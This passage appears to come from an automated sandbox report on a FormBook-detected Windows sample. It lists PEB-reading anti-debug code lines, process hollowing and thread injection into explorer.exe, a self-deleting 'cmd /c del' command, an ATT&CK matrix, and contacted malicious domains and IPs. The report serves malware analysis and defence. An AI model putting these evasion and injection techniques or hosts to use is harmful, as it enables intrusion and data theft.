          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324A70E mov eax, dword ptr fs:[00000030h]9_2_0324A70E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324A70E mov eax, dword ptr fs:[00000030h]9_2_0324A70E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0323F716 mov eax, dword ptr fs:[00000030h]9_2_0323F716
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AFF10 mov eax, dword ptr fs:[00000030h]9_2_032AFF10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AFF10 mov eax, dword ptr fs:[00000030h]9_2_032AFF10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322FF60 mov eax, dword ptr fs:[00000030h]9_2_0322FF60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E8F6A mov eax, dword ptr fs:[00000030h]9_2_032E8F6A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322EF40 mov eax, dword ptr fs:[00000030h]9_2_0322EF40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03228794 mov eax, dword ptr fs:[00000030h]9_2_03228794
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03297794 mov eax, dword ptr fs:[00000030h]9_2_03297794
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03297794 mov eax, dword ptr fs:[00000030h]9_2_03297794
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03297794 mov eax, dword ptr fs:[00000030h]9_2_03297794
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032537F5 mov eax, dword ptr fs:[00000030h]9_2_032537F5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321E620 mov eax, dword ptr fs:[00000030h]9_2_0321E620
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032CFE3F mov eax, dword ptr fs:[00000030h]9_2_032CFE3F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321C600 mov eax, dword ptr fs:[00000030h]9_2_0321C600
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321C600 mov eax, dword ptr fs:[00000030h]9_2_0321C600
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321C600 mov eax, dword ptr fs:[00000030h]9_2_0321C600
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03248E00 mov eax, dword ptr fs:[00000030h]9_2_03248E00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1608 mov eax, dword ptr fs:[00000030h]9_2_032D1608
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324A61C mov eax, dword ptr fs:[00000030h]9_2_0324A61C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324A61C mov eax, dword ptr fs:[00000030h]9_2_0324A61C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322766D mov eax, dword ptr fs:[00000030h]9_2_0322766D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0323AE73 mov eax, dword ptr fs:[00000030h]9_2_0323AE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0323AE73 mov eax, dword ptr fs:[00000030h]9_2_0323AE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0323AE73 mov eax, dword ptr fs:[00000030h]9_2_0323AE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0323AE73 mov eax, dword ptr fs:[00000030h]9_2_0323AE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0323AE73 mov eax, dword ptr fs:[00000030h]9_2_0323AE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03227E41 mov eax, dword ptr fs:[00000030h]9_2_03227E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03227E41 mov eax, dword ptr fs:[00000030h]9_2_03227E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03227E41 mov eax, dword ptr fs:[00000030h]9_2_03227E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03227E41 mov eax, dword ptr fs:[00000030h]9_2_03227E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03227E41 mov eax, dword ptr fs:[00000030h]9_2_03227E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03227E41 mov eax, dword ptr fs:[00000030h]9_2_03227E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032DAE44 mov eax, dword ptr fs:[00000030h]9_2_032DAE44
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032DAE44 mov eax, dword ptr fs:[00000030h]9_2_032DAE44
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E0EA5 mov eax, dword ptr fs:[00000030h]9_2_032E0EA5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E0EA5 mov eax, dword ptr fs:[00000030h]9_2_032E0EA5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E0EA5 mov eax, dword ptr fs:[00000030h]9_2_032E0EA5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032946A7 mov eax, dword ptr fs:[00000030h]9_2_032946A7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AFE87 mov eax, dword ptr fs:[00000030h]9_2_032AFE87
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032276E2 mov eax, dword ptr fs:[00000030h]9_2_032276E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032416E0 mov ecx, dword ptr fs:[00000030h]9_2_032416E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03258EC7 mov eax, dword ptr fs:[00000030h]9_2_03258EC7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032436CC mov eax, dword ptr fs:[00000030h]9_2_032436CC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032CFEC0 mov eax, dword ptr fs:[00000030h]9_2_032CFEC0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E8ED6 mov eax, dword ptr fs:[00000030h]9_2_032E8ED6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0321AD30 mov eax, dword ptr fs:[00000030h]9_2_0321AD30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032DE539 mov eax, dword ptr fs:[00000030h]9_2_032DE539
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]9_2_03223D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]9_2_03223D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]9_2_03223D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]9_2_03223D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]9_2_03223D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]9_2_03223D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]9_2_03223D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]9_2_03223D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]9_2_03223D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]9_2_03223D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]9_2_03223D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]9_2_03223D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03223D34 mov eax, dword ptr fs:[00000030h]9_2_03223D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E8D34 mov eax, dword ptr fs:[00000030h]9_2_032E8D34
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0329A537 mov eax, dword ptr fs:[00000030h]9_2_0329A537
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03244D3B mov eax, dword ptr fs:[00000030h]9_2_03244D3B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03244D3B mov eax, dword ptr fs:[00000030h]9_2_03244D3B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03244D3B mov eax, dword ptr fs:[00000030h]9_2_03244D3B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0323C577 mov eax, dword ptr fs:[00000030h]9_2_0323C577
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0323C577 mov eax, dword ptr fs:[00000030h]9_2_0323C577
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03253D43 mov eax, dword ptr fs:[00000030h]9_2_03253D43
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03293540 mov eax, dword ptr fs:[00000030h]9_2_03293540
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032C3D40 mov eax, dword ptr fs:[00000030h]9_2_032C3D40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03237D50 mov eax, dword ptr fs:[00000030h]9_2_03237D50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E05AC mov eax, dword ptr fs:[00000030h]9_2_032E05AC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E05AC mov eax, dword ptr fs:[00000030h]9_2_032E05AC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032435A1 mov eax, dword ptr fs:[00000030h]9_2_032435A1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03241DB5 mov eax, dword ptr fs:[00000030h]9_2_03241DB5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03241DB5 mov eax, dword ptr fs:[00000030h]9_2_03241DB5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03241DB5 mov eax, dword ptr fs:[00000030h]9_2_03241DB5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03242581 mov eax, dword ptr fs:[00000030h]9_2_03242581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03242581 mov eax, dword ptr fs:[00000030h]9_2_03242581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03242581 mov eax, dword ptr fs:[00000030h]9_2_03242581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03242581 mov eax, dword ptr fs:[00000030h]9_2_03242581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03212D8A mov eax, dword ptr fs:[00000030h]9_2_03212D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03212D8A mov eax, dword ptr fs:[00000030h]9_2_03212D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03212D8A mov eax, dword ptr fs:[00000030h]9_2_03212D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03212D8A mov eax, dword ptr fs:[00000030h]9_2_03212D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03212D8A mov eax, dword ptr fs:[00000030h]9_2_03212D8A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324FD9B mov eax, dword ptr fs:[00000030h]9_2_0324FD9B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324FD9B mov eax, dword ptr fs:[00000030h]9_2_0324FD9B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322D5E0 mov eax, dword ptr fs:[00000030h]9_2_0322D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322D5E0 mov eax, dword ptr fs:[00000030h]9_2_0322D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032DFDE2 mov eax, dword ptr fs:[00000030h]9_2_032DFDE2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032DFDE2 mov eax, dword ptr fs:[00000030h]9_2_032DFDE2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032DFDE2 mov eax, dword ptr fs:[00000030h]9_2_032DFDE2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032DFDE2 mov eax, dword ptr fs:[00000030h]9_2_032DFDE2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032C8DF1 mov eax, dword ptr fs:[00000030h]9_2_032C8DF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03296DC9 mov eax, dword ptr fs:[00000030h]9_2_03296DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03296DC9 mov eax, dword ptr fs:[00000030h]9_2_03296DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03296DC9 mov eax, dword ptr fs:[00000030h]9_2_03296DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03296DC9 mov ecx, dword ptr fs:[00000030h]9_2_03296DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03296DC9 mov eax, dword ptr fs:[00000030h]9_2_03296DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03296DC9 mov eax, dword ptr fs:[00000030h]9_2_03296DC9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324BC2C mov eax, dword ptr fs:[00000030h]9_2_0324BC2C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E740D mov eax, dword ptr fs:[00000030h]9_2_032E740D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E740D mov eax, dword ptr fs:[00000030h]9_2_032E740D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E740D mov eax, dword ptr fs:[00000030h]9_2_032E740D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03296C0A mov eax, dword ptr fs:[00000030h]9_2_03296C0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03296C0A mov eax, dword ptr fs:[00000030h]9_2_03296C0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03296C0A mov eax, dword ptr fs:[00000030h]9_2_03296C0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03296C0A mov eax, dword ptr fs:[00000030h]9_2_03296C0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]9_2_032D1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]9_2_032D1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]9_2_032D1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]9_2_032D1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]9_2_032D1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]9_2_032D1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]9_2_032D1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]9_2_032D1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]9_2_032D1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]9_2_032D1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]9_2_032D1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]9_2_032D1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]9_2_032D1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D1C06 mov eax, dword ptr fs:[00000030h]9_2_032D1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0323746D mov eax, dword ptr fs:[00000030h]9_2_0323746D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0324A44B mov eax, dword ptr fs:[00000030h]9_2_0324A44B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AC450 mov eax, dword ptr fs:[00000030h]9_2_032AC450
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032AC450 mov eax, dword ptr fs:[00000030h]9_2_032AC450
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_0322849B mov eax, dword ptr fs:[00000030h]9_2_0322849B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032D14FB mov eax, dword ptr fs:[00000030h]9_2_032D14FB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03296CF0 mov eax, dword ptr fs:[00000030h]9_2_03296CF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03296CF0 mov eax, dword ptr fs:[00000030h]9_2_03296CF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_03296CF0 mov eax, dword ptr fs:[00000030h]9_2_03296CF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 9_2_032E8CD6 mov eax, dword ptr fs:[00000030h]9_2_032E8CD6
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 1_2_00409B50 LdrLoadDll, 1_2_00409B50
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 0_2_1000EDD1 SetUnhandledExceptionFilter, UnhandledExceptionFilter, 0_2_1000EDD1

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: EA0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: unknown protection: read write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe Memory written: C:\Users\user\Desktop\TT COPY_02101011.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Thread register set: target process: 3424
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe Process created: C:\Users\user\Desktop\TT COPY_02101011.exe "C:\Users\user\Desktop\TT COPY_02101011.exe"
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\TT COPY_02101011.exe"
          Source: explorer.exe, 00000004.00000000.683168354.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000004.00000000.704124995.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000004.00000000.721487248.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000000.704735260.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.721832554.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.683913332.0000000001080000.00000002.00020000.sdmp, NETSTAT.EXE, 00000009.00000002.936194412.0000000005680000.00000002.00020000.sdmp Binary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.704735260.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.721832554.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.709424798.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.683913332.0000000001080000.00000002.00020000.sdmp, NETSTAT.EXE, 00000009.00000002.936194412.0000000005680000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.704735260.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.721832554.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.683913332.0000000001080000.00000002.00020000.sdmp, NETSTAT.EXE, 00000009.00000002.936194412.0000000005680000.00000002.00020000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.704735260.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.721832554.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000004.00000000.683913332.0000000001080000.00000002.00020000.sdmp, NETSTAT.EXE, 00000009.00000002.936194412.0000000005680000.00000002.00020000.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.729403220.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.692880282.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.713777981.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 0_2_10010DF5 cpuid, 0_2_10010DF5
          Source: C:\Users\user\Desktop\TT COPY_02101011.exe Code function: 0_2_0040594D GetVersion, GetSystemDirectoryA, GetWindowsDirectoryA, SHGetSpecialFolderLocation, SHGetPathFromIDListA, CoTaskMemFree, lstrcatA, lstrlenA, 0_2_0040594D

          Stealing of Sensitive Information:

          Yara detected FormBook

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | Native API 1 | Path Interception | Process Injection 612 | Virtualization/Sandbox Evasion 2 | OS Credential Dumping | Security Software Discovery 251 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1 |
| Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 612 | LSASS Memory | Virtualization/Sandbox Evasion 2 | Remote Desktop Protocol | Clipboard Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 2 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 1 | LSA Secrets | System Network Configuration Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | File Deletion 1 | Cached Domain Credentials | System Network Connections Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
| External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | File and Directory Discovery 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
| Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery 113 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |

          Behavior Graph

Behavior Graph ID: 528714
Sample: TT COPY_02101011.exe
Startdate: 25/11/2021
Architecture: WINDOWS
Score: 100

DNS/IP info (graph root): www.helpfromjames.com, www.dandftrading.com, 4 other IPs or domains
Signatures (graph root): Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures

Process tree:

• TT COPY_02101011.exe (started)
  - Dropped: C:\Users\user\AppData\...\wdtzbwxasut.dll, PE32
  - Signature: Injects a PE file into a foreign processes
  • TT COPY_02101011.exe (started)
    - Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
    • explorer.exe (injected)
      - DNS/IP info: www.blttsperma.quest 37.123.118.150, 49820, 80 UK2NET-ASGB United Kingdom; www.le-hameau-enchanteur.com 213.186.33.5, 49784, 80 OVHFR France; 11 other IPs or domains
      - Signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation; Uses netstat to query active network connections and open ports
      • NETSTAT.EXE (started)
        - Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
        • cmd.exe (started)
          • conhost.exe (started)
      • autoconv.exe (started)

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

| Source | Detection | Scanner | Label |
|---|---|---|---|
| TT COPY_02101011.exe | 36% | Virustotal | |
| TT COPY_02101011.exe | 16% | ReversingLabs | Win32.Trojan.Nemesis |

          Dropped Files

| Source | Detection | Scanner | Label |
|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll | 100% | Joe Sandbox ML | |
| C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll | 16% | ReversingLabs | |

          Unpacked PE Files

| Source | Detection | Scanner | Label |
|---|---|---|---|
| 1.0.TT COPY_02101011.exe.400000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
| 1.1.TT COPY_02101011.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
| 1.0.TT COPY_02101011.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
| 1.0.TT COPY_02101011.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen2 |
| 0.2.TT COPY_02101011.exe.2a30000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
| 9.2.NETSTAT.EXE.372796c.4.unpack | 100% | Avira | TR/Patched.Ren.Gen |
| 1.2.TT COPY_02101011.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |
| 9.2.NETSTAT.EXE.d6e840.0.unpack | 100% | Avira | TR/Patched.Ren.Gen |
| 1.0.TT COPY_02101011.exe.400000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |

          Domains

| Source | Detection | Scanner | Label |
|---|---|---|---|
| www.le-hameau-enchanteur.com | 1% | Virustotal | |

          URLs

| Source | Detection | Scanner | Label |
|---|---|---|---|
| www.helpfromjames.com/e8ia/ | 0% | Avira URL Cloud | safe |
